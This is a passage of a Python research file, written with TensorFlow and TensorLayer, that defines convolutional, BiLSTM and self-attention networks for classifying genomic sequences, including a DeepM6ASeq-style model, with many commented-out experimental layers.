This parts plays an role as a selector of fixed position in genes, works like attention mechanism
sequences: tf.place_holder([None, steps, embedding_dim])
'''
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope("selector", reuse=reuse) as vs:
# tl.layers.set_name_reuse(reuse) # remove for TL 1.8.0+
sequences = InputLayer(t_sequences, name='in')
# is it ok to add a embedding layer here
# use strided convolution to decrease length of sequences
return sequences,sequences
sequences = Conv1d(sequences, 32,KERNEL_SIZE , stride = 2, dilation_rate = 1, act = act, name = 'conv_500') # 500
sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = act, name = 'conv_250') # 250
sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = act, name = 'conv_125') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_63') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_31') # 125
# stacking 3 bi-directiona,l lstm here
bi = BiRNNLayer(sequences, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
bi = PReluLayer(bi, channel_shared = True, name='prelu1')
#bi = BiRNNLayer(bi, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.TIME_STEPS, return_last = False, name='bi2')
#bi = PReluLayer(bi, channel_shared = True, name = 'prelu2')
#bi = BiRNNLayer(bi, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi3')
#bi = PReluLayer(bi, channel_shared = True, name='prelu3')
# use last outputs of bi-lstm to generate attention
features = FlattenLayer(bi, name='flatten_feature')
# downsample was introduced for the overfitting issue
sampled = DenseLayer(features, config.TRAIN.FC, act = act, name='downsample')
# true selecting
# 1000
selecting_logits = DenseLayer(sampled, config.TRAIN.TIME_STEPS, act = None, name='selector')
selecting = tl.layers.LambdaLayer(selecting_logits, fn = act, name='Selecting_softmax')
#print(selecting.outputs.shape)
selecting = tl.layers.ExpandDimsLayer(selecting, 2)
# broadcasting to all embeded dimension
selecting = TileLayer(selecting, [1,1,config.TRAIN.EMBED_DIM])
# by visualizing selecting vector, can detect difference between species.
return selecting, selecting_logits
def SelectorCNN(t_sequences, reuse = False):
'''
This parts plays an role as a selector of fixed position in genes, works like attention mechanism
sequences: tf.place_holder([None, steps, embedding_dim])
'''
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope("selectorCNN", reuse=reuse) as vs:
# tl.layers.set_name_reuse(reuse) # remove for TL 1.8.0+
sequences = InputLayer(t_sequences, name='in')
# is it ok to add a embedding layer here
# use strided convolution to decrease length of sequences
#
#sequences = Conv1d(sequences, 32,KERNEL_SIZE , stride = 2, dilation_rate = 1, act = act, name = 'conv_500') # 500
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = act, name = 'conv_250') # 250
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = act, name = 'conv_125') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_63') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_31') # 125
#features = Conv1d(selected, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = act, name = 'conv1')
features = Conv1d(sequences, 64, KERNEL_SIZE, stride = 2, act = act, name = 'conv1_stride')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 1, dilation_rate = 2, act = act, name = 'conv2')
features = Conv1d(features, 128, KERNEL_SIZE, stride = 2, act = act, name = 'conv2_stride')
features = Conv1d(features, 128, KERNEL_SIZE, stride = 1, dilation_rate = 4, act = act, name = 'conv3')
features = Conv1d(features, 256, KERNEL_SIZE, stride = 2, act = act, name = 'conv3_stride')
# stacking 3 bi-directiona,l lstm here
#bi = BiRNNLayer(sequences, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
#bi = PReluLayer(bi, channel_shared = True, name='prelu1')
#bi = BiRNNLayer(bi, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.TIME_STEPS, return_last = False, name='bi2')
#bi = PReluLayer(bi, channel_shared = True, name = 'prelu2')
#bi = BiRNNLayer(bi, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi3')
#bi = PReluLayer(bi, channel_shared = True, name='prelu3')
# use last outputs of bi-lstm to generate attention
features = FlattenLayer(features, name='flatten_feature')
# downsample was introduced for the overfitting issue
sampled = DenseLayer(features, config.TRAIN.FC, act = act, name='downsample')
# true selecting
# 1000
selecting_logits = DenseLayer(sampled, config.TRAIN.TIME_STEPS, act = tf.nn.softmax, name='selector')
selecting = tl.layers.LambdaLayer(selecting_logits, fn = tf.nn.softmax, name='selector_softmax')
#print(selecting.outputs.shape)
selecting = tl.layers.ExpandDimsLayer(selecting, 2)
# broadcasting to all embeded dimension
selecting = TileLayer(selecting, [1,1,config.TRAIN.EMBED_DIM])
# by visualizing selecting vector, can detect difference between species.
return selecting, selecting_logits
def Predictor(selecting, t_sequences, reuse = False):
'''
use seleceted features to do prediction
'''
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope("predictor", reuse=tf.AUTO_REUSE) as vs:
# tl.layers.set_name_reuse(reuse) # remove for TL 1.8.0+
sequences = InputLayer(t_sequences, name='in')
def scale(x):
return 1000 * x
selected = sequences
#selecting = LambdaLayer(selecting, fn = scale, name='scale')
#selected = ElementwiseLayer([selecting, sequences], combine_fn = tf.multiply, name='selection')
# USE convolution for computing? why?
# use dialated convolution for larger reception field.
# binding codon is 3
# add depth for feature extraction
pre = Conv1d(selected, 32, act = act, name = 'conv0')
selected = pre
for i in range(config.TRAIN.STACK_DEPTH):
features = Conv1d(selected, 32, act = act, name = 'conv1_%d'%i)
features = Conv1d(features, 32, act = None, name = 'conv2_%d'%i)
selected = ElementwiseLayer([selected, features], combine_fn = tf.math.add, name = 'bypass_%d'%i)
selected = ElementwiseLayer([pre, selected], combine_fn = tf.math.add, name = 'bypass_%d'%i)
# google deepwave radio sl
# downsample pooling dialation
# no lstm, but larger reception field
features = Conv1d(selected, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = act, name = 'conv1')
features = Conv1d(selected, 64, KERNEL_SIZE, stride = 2, act = act, name = 'conv1_stride')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 1, dilation_rate = 2, act = act, name = 'conv2')
features = Conv1d(features, 128, KERNEL_SIZE, stride = 2, act = act, name = 'conv2_stride')
features = Conv1d(features, 128, KERNEL_SIZE, stride = 1, dilation_rate = 4, act = act, name = 'conv3')
features = Conv1d(features, 256, KERNEL_SIZE, stride = 2, act = act, name = 'conv3_stride')
features = FlattenLayer(features, name='flatten_features')
hidden = DenseLayer(features, config.TRAIN.FC, name='hidden')
hidden = PReluLayer(hidden, channel_shared = True, name='prelu1')
category = DenseLayer(hidden, config.TRAIN.CLASSES, act = None, name = 'predicting')
return category, tf.nn.softmax(category.outputs)
def sharedFeatureExtractor(t_sequences, name, reuse = False, is_train = True):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
#return sequences, sequences.outputs
#return sequences
# user larger kernel size for the first layer
feature1 = Conv1d(sequences, 300, 20, stride = 1, dilation_rate = 1, act = None, name = 'conv_500') # 500
feature1 = tl.layers.BatchNormLayer(feature1, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
feature1 = PReluLayer(feature1, channel_shared = True, name='conv1_relu')
if config.TRAIN.DROPOUT:
feature1 = DropoutLayer(feature1, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features1', is_fix = True)
feature1 = SelfAttentionLayer(feature1, 8, 32, name='attention1')
# used to simulate gapped kmer
#feature2 = Conv1d(sequences, 300, 20, stride = 1, dilation_rate = 2, act = None, name = 'conv_8_2') # 500
#features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
#feature2 = PReluLayer(feature2, channel_shared = True, name='conv1_2_relu')
#feature3 = Conv1d(sequences, 300, 20, stride = 1, dilation_rate = 4, act = None, name = 'conv_16_2') # 500
#features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
#feature3 = PReluLayer(feature3, channel_shared = True, name='conv1_3_relu')
#features = ConcatLayer([feature1, feature2, feature3], name = 'concat')
features = Conv1d(feature1, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conva_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bna2')
features = PReluLayer(features, channel_shared = True, name='conv2a_relu')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features', is_fix = True)
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_2', is_fix = True)
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_125') # 125
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_3', is_fix = True)
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_63') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_31') # 125
# stacking 3 bi-directiona,l lstm here
features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
#features = PReluLayer(features, channel_shared = True, name='prelu1')
#
'''
features = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = None, name = 'conv1')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv2_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
'''
return features, feature1.outputs
def sharedFeatureExtractor2(t_sequences, name, reuse = False, is_train = True):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
kernels = config.TRAIN.KERNEL.split('_')
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
#return sequences, sequences.outputs
#return sequences
# user larger kernel size for the first layer
feature_conv = Conv1d(sequences, 300, int(kernels[0]), stride = 1, dilation_rate = 1, act = None, name = 'conv_500') # 500
feature1 = tl.layers.BatchNormLayer(feature_conv, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
feature1 = PReluLayer(feature1, channel_shared = True, name='conv1_relu')
if config.TRAIN.DROPOUT:
feature1 = DropoutLayer(feature1, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features1', is_fix = True, is_train = is_train)
# used to simulate gapped kmer
feature2 = Conv1d(sequences, 300, int(kernels[1]), stride = 1, dilation_rate = 2, act = None, name = 'conv_8_2') # 500
feature2 = tl.layers.BatchNormLayer(feature2, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='feature2_bn')
feature2 = PReluLayer(feature2, channel_shared = True, name='conv1_2_relu')
if config.TRAIN.DROPOUT:
feature2 = DropoutLayer(feature2, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features2', is_fix = True, is_train = is_train)
feature3 = Conv1d(sequences, 300, int(kernels[2]), stride = 1, dilation_rate = 4, act = None, name = 'conv_16_2') # 500
feature3 = tl.layers.BatchNormLayer(feature3, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
feature3 = PReluLayer(feature3, channel_shared = True, name='conv1_3_relu')
if config.TRAIN.DROPOUT:
feature3 = DropoutLayer(feature3, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features3', is_fix = True, is_train = is_train)
features = ConcatLayer([feature1, feature2, feature3], name = 'concat')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conva_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bna3')
con_features = PReluLayer(features, channel_shared = True, name='conv2a_relu')
if config.TRAIN.DROPOUT:
con_features = DropoutLayer(con_features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features4', is_fix = True, is_train = is_train)
features = Conv1d(con_features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conva_250_c') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bna3_c')
features = PReluLayer(features, channel_shared = True, name='conv2a_relu_c')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_featuress1', is_fix = True, is_train = is_train)
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_250') # 250
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn4')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_featuresss2', is_fix = True, is_train = is_train)
features = ElementwiseLayer([features, con_features], tf.add, name = 'elem_add')
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv_125') # 125
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn5')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_featuresss3', is_fix = True, is_train = is_train)
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_63') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_31') # 125
# stacking 3 bi-directiona,l lstm here
features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
#features = PReluLayer(features, channel_shared = True, name='prelu1')
#features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = config.TRAIN.RNN_HIDDEN, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi2')
#
features = SelfAttentionLayer(features, 8 , 128,name='self-attention')
features = SelfAttentionLayer(features, 8 , 128,name='self-attention2')
'''
features = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = None, name = 'conv1')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv2_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
'''
return features, feature_conv.outputs#, features.outputs
def attention(feature, name):
hidden = tl.layers.TimeDistributedLayer(feature, layer_class=tl.layers.DenseLayer, args={'n_units':64, 'name':name + 'dense','act' :tf.nn.tanh}, name= name + 'time_dense')
hidden = tl.layers.TimeDistributedLayer(hidden, layer_class=tl.layers.DenseLayer, args={'n_units':1, 'name':name + 'dense2'}, name= name + 'time_dense2')
hidden = tl.layers.FlattenLayer(hidden, name = name + 'flatten')
return LambdaLayer(hidden, fn = tf.nn.softmax, name = name + "_softmax")
def sharedFeatureExtractor2D(t_sequences, name, reuse = False, is_train=True):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
#return sequences
features = Conv2d(sequences, 32,KERNEL_SIZE , stride = 2, dilation_rate = 1, act = None, name = 'conv_500') # 500
#features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
features = Conv2d(features, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = None, name = 'conv_250') # 250
#features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
features = Conv2d(features, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = None, name = 'conv_125') # 125
#features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_63') # 125
#sequences = Conv1d(sequences, 32, KERNEL_SIZE, stride = 4, dilation_rate = 1, act = act, name = 'conv_31') # 125
''''
features_ex = Conv1d(features, 32, KERNEL_SIZE, act = None, name = 'conv_same') # 125
features_ex = tl.layers.BatchNormLayer(features_ex, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn_same')
features_ex = PReluLayer(features_ex, channel_shared = True, name='convsame_relu')
# Introducing self-attention here
attention_map = AttentionLayer(features, name = 'Extractor_')
#attention_map = attention(features, 'Extractor_')
attention_map = tl.layers.ExpandDimsLayer(attention_map, 2)
attention_map = TileLayer(attention_map, [1,1,32])
features_masked = ElementwiseLayer([attention_map, features], combine_fn = tf.multiply, name='selection')
# different species will have different attention
features = tl.layers.ConcatLayer([features_ex, features_masked], -1, name ='concat_layer')
# stacking 3 bi-directiona,l lstm here
'''
features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = int(config.TRAIN.RNN_HIDDEN/4), n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
#features = PReluLayer(features, channel_shared = True, name='prelu1')
#self-attention mechanism
'''
features = Conv1d(sequences, 32, KERNEL_SIZE, stride = 2, dilation_rate = 1, act = None, name = 'conv1')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 2, act = None, name = 'conv2_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
features = PReluLayer(features, channel_shared = True, name='conv3_relu')
'''
return features
def classifier(features, name, reuse = False, is_train = True):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope(name, reuse=reuse) as vs:
conv_features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv1')
features = tl.layers.BatchNormLayer(conv_features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
#if config.TRAIN.DROPOUT:
# features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_1', is_fix = True, is_train = is_train)
#features = ConcatLayer([features, seq_features], name = 'seq_concat')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 1, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
fin_features = PReluLayer(features, channel_shared = True, name='conv2_relu')
#if config.TRAIN.DROPOUT:
# features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_2', is_fix = True, is_train = is_train)
features = FlattenLayer(fin_features, name='flatten_features')
features = DenseLayer(features, config.TRAIN.FC, act = None, name='hidden')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
hidden = PReluLayer(features, channel_shared = True, name='prelu1')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_3', is_fix = True, is_train = is_train)
category = DenseLayer(hidden, 2, act = None, name = 'predicting')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_3', is_fix = True, is_train = is_train)
return category#, conv_features
def classifierSequences(features, t_sequences, name, reuse, is_train):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
seq_features = Conv1d(sequences, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'seq_conv1')
seq_features = tl.layers.BatchNormLayer(seq_features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='seq_bn1')
seq_features = PReluLayer(seq_features, channel_shared = True, name='seq_conv1_relu')
seq_features1 = Conv1d(seq_features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'res_seq_conv1')
#seq_features = tl.layers.BatchNormLayer(seq_features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='seq_bn1')
seq_features1 = PReluLayer(seq_features1, channel_shared = True, name='res_seq_conv1_relu')
seq_features1 = Conv1d(seq_features1, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'res_seq_conv1')
seq_features = ElementwiseLayer([seq_features, seq_features1], tf.add, name = 'elem_add')
seq_features = SelfAttentionLayer(seq_features, 8,128,name='seq_attention')
seq_features = Conv1d(seq_features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = '_seq_conv1')
seq_features = tl.layers.BatchNormLayer(seq_features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='_seq_bn1')
seq_features = PReluLayer(seq_features, channel_shared = True, name='_res_seq_conv1_relu')
'''
if config.TRAIN.DROPOUT:
seq_features = DropoutLayer(seq_features, keep = config.TRAIN.DROPOUT_KEEP, name = 'seq_drop_features_1', is_fix = True, is_train = is_train)
'''
features = Conv1d(features, 32, KERNEL_SIZE, stride = 1, dilation_rate = 1, act = None, name = 'conv1')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
'''
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, DROPOUT_KEEP = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_1', is_fix = True, is_train = is_train)
'''
features = ConcatLayer([features, seq_features], name = 'seq_concat')
features = Conv1d(features, 64, KERNEL_SIZE, stride = 1, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
'''
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_2', is_fix = True, is_train = is_train)
'''
features = FlattenLayer(features, name='flatten_features')
features = DenseLayer(features, config.TRAIN.FC, act = None, name='hidden')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
hidden = PReluLayer(features, channel_shared = True, name='prelu1')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_3', is_fix = True, is_train = is_train)
category = DenseLayer(hidden, 2, act = None, name = 'predicting')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_featudres_3', is_fix = True, is_train = is_train)
return category
def DeepM6ASeq_pre(t_sequences, name, reuse = False, is_train = True):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
kernels = config.TRAIN.KERNEL.split('_')
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
return sequences, sequences.outputs
def DeepM6ASeq(features, name, reuse = False, is_train = True):
w_init = tf.random_normal_initializer(stddev=stddev)
b_init = None
g_init = tf.random_normal_initializer(1., stddev)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
with tf.variable_scope(name, reuse=reuse) as vs:
features = Conv1d(features, 256, 10, stride = 1, dilation_rate = 1, act = None, name = 'conv1')
#MaxPool1d(features,)
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
features = PReluLayer(features, channel_shared = True, name='conv1_relu')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = 0.5, name = 'drop_features_1', is_fix = True, is_train = is_train)
features = Conv1d(features, 64, 5, stride = 1, act = None, name = 'conv1_stride')
features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn2')
features = PReluLayer(features, channel_shared = True, name='conv2_relu')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = 0.5, name = 'drop_features_2', is_fix = True, is_train = is_train)
fin_features = BiRNNLayer(features, cell_fn = tf.contrib.rnn.LSTMCell, n_hidden = 32, n_steps = config.TRAIN.RNN_STEPS + 1, return_last = False, name = 'bi1')
#MaxPool1d
features = FlattenLayer(fin_features, name='flatten_features')
#features = DenseLayer(features, config.TRAIN.FC, act = None, name='hidden')
#features = tl.layers.BatchNormLayer(features, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn3')
#hidden = PReluLayer(features, channel_shared = True, name='prelu1')
if config.TRAIN.DROPOUT:
features = DropoutLayer(features, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features_3', is_fix = True, is_train = is_train)
category = DenseLayer(features, 2, act = None, name = 'predicting')
return category, fin_features
def sharedFeatureExtractor3(t_sequences, name, reuse = False, is_train = True):
'''
Use attention to replace the LSTM layer
'''
w_init = tf.random_normal_initializer(stddev=0.2)
b_init = None
g_init = tf.random_normal_initializer(1., 0.2)
act = lambda x: tf.nn.leaky_relu(x, 0.2)
kernels = config.TRAIN.KERNEL.split('_')
with tf.variable_scope(name, reuse=reuse) as vs:
sequences = InputLayer(t_sequences, name='in')
embedding = EmbeddingInputlayer(sequences, 5, 32)
#return sequences, sequences.outputs
#return sequences
# user larger kernel size for the first layer
feature1 = Conv1d(embedding, 300, int(kernels[0]), stride = 1, dilation_rate = 1, act = None, name = 'conv_500') # 500
feature1 = tl.layers.BatchNormLayer(feature1, beta_init = w_init, gamma_init = w_init, is_train = is_train, name='bn1')
feature1 = PReluLayer(feature1, channel_shared = True, name='conv1_relu')
'''
if config.TRAIN.DROPOUT:
feature1 = DropoutLayer(feature1, keep = config.TRAIN.DROPOUT_KEEP, name = 'drop_features1', is_fix = True)
'''
# used to simulate gapped kmer
